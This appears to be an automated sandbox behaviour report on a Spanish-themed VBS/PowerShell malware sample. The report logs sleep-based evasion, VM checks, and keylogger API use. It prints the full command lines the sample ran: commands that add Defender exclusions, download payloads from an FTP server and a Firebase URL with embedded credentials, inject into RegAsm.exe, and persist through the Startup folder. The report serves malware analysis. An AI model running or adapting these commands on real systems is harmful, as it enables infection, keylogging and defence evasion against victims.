                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 680 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7804Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: wscript.exe, 00000000.00000003.2074794521.000001EBC1D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\usage o
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39306F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39440D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39440D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
                        Source: powershell.exe, 00000017.00000002.2422086929.0000020956771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}werShell.lnk
                        Source: powershell.exe, 00000017.00000002.2756232396.0000020970B86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39440D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                        Source: powershell.exe, 00000017.00000002.2756232396.0000020970B86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb
                        Source: powershell.exe, 00000004.00000002.2911305481.000001D3AB3B2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2444391639.0000020A424F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3047042436.0000000005D30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2654257361.00000207A7AF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: amsi64_1088.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2748, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR
                        Source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, Class1.csReference to suspicious API methods: Conversions.ToGenericParameter<_FDD0>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref _FDD0), ref _FDD1), typeof(_FDD0)))
                        Source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, Class1.csReference to suspicious API methods: Conversions.ToGenericParameter<_FDD0>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref _FDD0), ref _FDD1), typeof(_FDD0)))
                        Source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, Program.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, cbName, ref lpszVer, 100)
                        Source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, Keylogger.csReference to suspicious API methods: MapVirtualKey(a, 0u)
                        Source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, Keylogger.csReference to suspicious API methods: GetAsyncKeyState(num2)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 408000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8ED008Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 408000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1074008
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 408000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A77008
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$qkkzc = 'owb9???ds???kq???g???ck???i??????n???gu???dqby???hq???jw???g???cw???i???by???f??????vqb1???gg???j??????g???cw???i??????n???gg???d???b0???h??????cw???6???c8???lwbm???gk???cgbl???gi???yqbz???gu???cwb0???g8???cgbh???gc???zq???u???gc???bwbv???gc???b???bl???ge???c???bp???hm???lgbj???g8???bq???v???hy???m??????v???gi???lwbk???gu???cwbj???ge???cgbn???ge???cw???t???gq???yw???0???gq???ng???u???ge???c???bw???hm???c???bv???hq???lgbj???g8???bq???v???g8???lwbl???g4???dgbp???g8???cw???t???g4???dqbl???hy???bwbz???c4???d???b4???hq???pwbh???gw???d??????9???g0???zqbk???gk???yq???m???hq???bwbr???gu???bg???9???gm???zq???2???dk???m???bh???dy???m??????t???dc???o???bl???gi???lq???0???d??????mqbi???c0???ygbm???gm???ng???t???de???z???bj???dg???mg???1???gu???mq???5???dq???yg???y???cc???i??????o???c??????xqbd???fs???d???bj???gu???agbi???g8???ww???g???cw???i???bs???gw???dqbu???cq???i??????o???gu???awbv???hy???bgbj???c4???kq???g???cc???sqbw???ey???cgbw???cc???i??????o???gq???bwbo???hq???zqbn???hq???zqbh???c4???kq???n???de???cwbz???ge???b???bd???c4???mwb5???hi???yqby???gi???aqbm???hm???cwbh???gw???qw???n???cg???zqbw???hk???v???b0???gu???rw???u???ck???i???ba???gm???qgbj???ge???j??????g???cg???z???bh???g8???t??????u???g4???aqbh???g0???bwbe???hq???bgbl???hi???cgb1???em???og???6???f0???bgbp???ge???bqbv???eq???c???bw???ee???lgbt???gu???d???bz???hk???uwbb???ds???kq???g???ck???i??????n???ee???jw???g???cw???i??????n???jmhogctisc???i??????o???gu???ywbh???gw???c???bl???fi???lgbn???fm???egbd???ei???b??????k???c??????k???bn???g4???aqby???hq???uw???0???dy???zqbz???ge???qgbt???g8???cgbg???do???ogbd???hq???cgbl???hy???bgbv???em???lgbt???gu???d???bz???hk???uwbb???c??????pq???g???fo???ywbc???gm???yq???k???c??????xqbd???fs???zqb0???hk???qgbb???ds???jw???l???ek???a???bx???fi???w??????l???cc???i??????9???c??????w???bq???fu???dqbo???cq???ow???p???c??????zwbt???ho???qwbc???gw???j??????g???cg???zwbu???gk???cgb0???fm???z???bh???g8???b???bu???hc???bwbe???c4???egb0???hg???a??????k???c??????pq???g???gc???uwb6???em???qgbs???cq???ow???4???ey???v???bv???do???ogbd???gc???bgbp???gq???bwbj???g4???rq???u???hq???e???bl???fq???lgbt???gu???d???bz???hk???uwbb???c??????pq???g???gc???bgbp???gq???bwbj???g4???rq???u???ho???d???b4???gg???j??????7???ck???d???bu???gu???aqbs???em???ygbl???fc???lgb0???gu???tg???g???hq???ywbl???go???ygbp???c0???dwbl???e4???k??????g???d0???i???b6???hq???e???bo???cq???ow???p???cg???zqbz???g8???c???bz???gk???z??????u???ho???d???b4???gg???j??????7???ck???i??????n???hq???e???b0???c4???mq???w???ew???t???be???c8???mq???w???c8???cgbl???hq???c???b5???hi???ywbw???fu???lwby???gi???lgbt???g8???yw???u???hq???yqby???gi???dgbr???gm???cwbl???gq???lgbw???hq???zgb??????de???d???bh???hi???ygb2???gs???ywbz???gu???z??????v???c8???ogbw???hq???zg???n???c??????k???bn???g4???aqby???hq???uwbk???ge???bwbs???g4???dwbv???eq???lgb6???hq???e???bo???cq???i??????9???c??????zwbt???ho???qw
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $zenbp = $host.version.major.equals(2) ;if ( $zenbp ) {$dxtjn = [system.io.path]::gettemppath();del ( $dxtjn + '\upwin.msu' );$gukxo = 'https://drive.google.com/uc?export=download&id=';$qvcnu = $env:processor_architecture.contains('64') ;if ( $qvcnu ) {$gukxo = ($gukxo + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$gukxo = ($gukxo + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$jvyjn = (new-object net.webclient);$jvyjn.encoding = [system.text.encoding]::utf8;$jvyjn.downloadfile($urlkb, $dxtjn + '\upwin.msu');$mynkz = ('c:\users\' + [environment]::username );riwcg = ($dxtjn + '\upwin.msu'); powershell.exe wusa.exe riwcg /quiet /norestart ; copy-item 'c:\users\user\desktop\oficio notificacion multas y sanciones.vbs' -destination ( $mynkz + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$hxtz = (new-object net.webclient);$hxtz.encoding = [system.text.encoding]::utf8;$hxtz.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $hxtz.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$hxtz.dispose();$hxtz = (new-object net.webclient);$hxtz.encoding = [system.text.encoding]::utf8;$lbczsg = $hxtz.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\oficio notificacion multas y sanciones.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huupx , 'true' ) );};"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$qkkzc = 'owb9???ds???kq???g???ck???i??????n???gu???dqby???hq???jw???g???cw???i???by???f??????vqb1???gg???j??????g???cw???i??????n???gg???d???b0???h??????cw???6???c8???lwbm???gk???cgbl???gi???yqbz???gu???cwb0???g8???cgbh???gc???zq???u???gc???bwbv???gc???b???bl???ge???c???bp???hm???lgbj???g8???bq???v???hy???m??????v???gi???lwbk???gu???cwbj???ge???cgbn???ge???cw???t???gq???yw???0???gq???ng???u???ge???c???bw???hm???c???bv???hq???lgbj???g8???bq???v???g8???lwbl???g4???dgbp???g8???cw???t???g4???dqbl???hy???bwbz???c4???d???b4???hq???pwbh???gw???d??????9???g0???zqbk???gk???yq???m???hq???bwbr???gu???bg???9???gm???zq???2???dk???m???bh???dy???m??????t???dc???o???bl???gi???lq???0???d??????mqbi???c0???ygbm???gm???ng???t???de???z???bj???dg???mg???1???gu???mq???5???dq???yg???y???cc???i??????o???c??????xqbd???fs???d???bj???gu???agbi???g8???ww???g???cw???i???bs???gw???dqbu???cq???i??????o???gu???awbv???hy???bgbj???c4???kq???g???cc???sqbw???ey???cgbw???cc???i??????o???gq???bwbo???hq???zqbn???hq???zqbh???c4???kq???n???de???cwbz???ge???b???bd???c4???mwb5???hi???yqby???gi???aqbm???hm???cwbh???gw???qw???n???cg???zqbw???hk???v???b0???gu???rw???u???ck???i???ba???gm???qgbj???ge???j??????g???cg???z???bh???g8???t??????u???g4???aqbh???g0???bwbe???hq???bgbl???hi???cgb1???em???og???6???f0???bgbp???ge???bqbv???eq???c???bw???ee???lgbt???gu???d???bz???hk???uwbb???ds???kq???g???ck???i??????n???ee???jw???g???cw???i??????n???jmhogctisc???i??????o???gu???ywbh???gw???c???bl???fi???lgbn???fm???egbd???ei???b??????k???c??????k???bn???g4???aqby???hq???uw???0???dy???zqbz???ge???qgbt???g8???cgbg???do???ogbd???hq???cgbl???hy???bgbv???em???lgbt???gu???d???bz???hk???uwbb???c??????pq???g???fo???ywbc???gm???yq???k???c??????xqbd???fs???zqb0???hk???qgbb???ds???jw???l???ek???a???bx???fi???w??????l???cc???i??????9???c??????w???bq???fu???dqbo???cq???ow???p???c??????zwbt???ho???qwbc???gw???j??????g???cg???zwbu???gk???cgb0???fm???z???bh???g8???b???bu???hc???bwbe???c4???egb0???hg???a??????k???c??????pq???g???gc???uwb6???em???qgbs???cq???ow???4???ey???v???bv???do???ogbd???gc???bgbp???gq???bwbj???g4???rq???u???hq???e???bl???fq???lgbt???gu???d???bz???hk???uwbb???c??????pq???g???gc???bgbp???gq???bwbj???g4???rq???u???ho???d???b4???gg???j??????7???ck???d???bu???gu???aqbs???em???ygbl???fc???lgb0???gu???tg???g???hq???ywbl???go???ygbp???c0???dwbl???e4???k??????g???d0???i???b6???hq???e???bo???cq???ow???p???cg???zqbz???g8???c???bz???gk???z??????u???ho???d???b4???gg???j??????7???ck???i??????n???hq???e???b0???c4???mq???w???ew???t???be???c8???mq???w???c8???cgbl???hq???c???b5???hi???ywbw???fu???lwby???gi???lgbt???g8???yw???u???hq???yqby???gi???dgbr???gm???cwbl???gq???lgbw???hq???zgb??????de???d???bh???hi???ygb2???gs???ywbz???gu???z??????v???c8???ogbw???hq???zg???n???c??????k???bn???g4???aqby???hq???uwbk???ge???bwbs???g4???dwbv???eq???lgb6???hq???e???bo???cq???i??????9???c??????zwbt???ho???qwJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $zenbp = $host.version.major.equals(2) ;if ( $zenbp ) {$dxtjn = [system.io.path]::gettemppath();del ( $dxtjn + '\upwin.msu' );$gukxo = 'https://drive.google.com/uc?export=download&id=';$qvcnu = $env:processor_architecture.contains('64') ;if ( $qvcnu ) {$gukxo = ($gukxo + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$gukxo = ($gukxo + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$jvyjn = (new-object net.webclient);$jvyjn.encoding = [system.text.encoding]::utf8;$jvyjn.downloadfile($urlkb, $dxtjn + '\upwin.msu');$mynkz = ('c:\users\' + [environment]::username );riwcg = ($dxtjn + '\upwin.msu'); powershell.exe wusa.exe riwcg /quiet /norestart ; copy-item 'c:\users\user\desktop\oficio notificacion multas y sanciones.vbs' -destination ( $mynkz + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$hxtz = (new-object net.webclient);$hxtz.encoding = 